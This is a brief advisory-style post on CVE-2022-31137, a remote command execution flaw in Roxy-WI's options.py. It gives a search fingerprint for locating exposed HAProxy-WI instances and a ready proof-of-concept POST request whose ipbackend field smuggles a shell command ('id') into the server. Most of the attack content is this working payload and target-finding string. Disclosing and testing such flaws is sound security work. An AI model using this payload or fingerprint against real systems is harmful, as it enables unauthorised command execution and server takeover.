Roxy Wi Options Py Remote Command Execution Vulnerability Cve 2022 31137
Roxy Wi Options Py Remote Command Execution Vulnerability Cve 2022 31137
Roxy-Wi options.py remote command execution vulnerability CVE-2022-31137
Vulnerability Description
Roxy-Wi options.py has a remote command execution vulnerability, and an attacker can execute commands to obtain server permissions through the vulnerability.
Vulnerability Impact
Roxy-WI
Network surveying and mapping
app=”HAProxy-WI”
Vulnerability reappears
Login page
Verify POC
1
2
3
POST /app/options.py
alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1
This post is licensed under CC BY 4.0 by the author.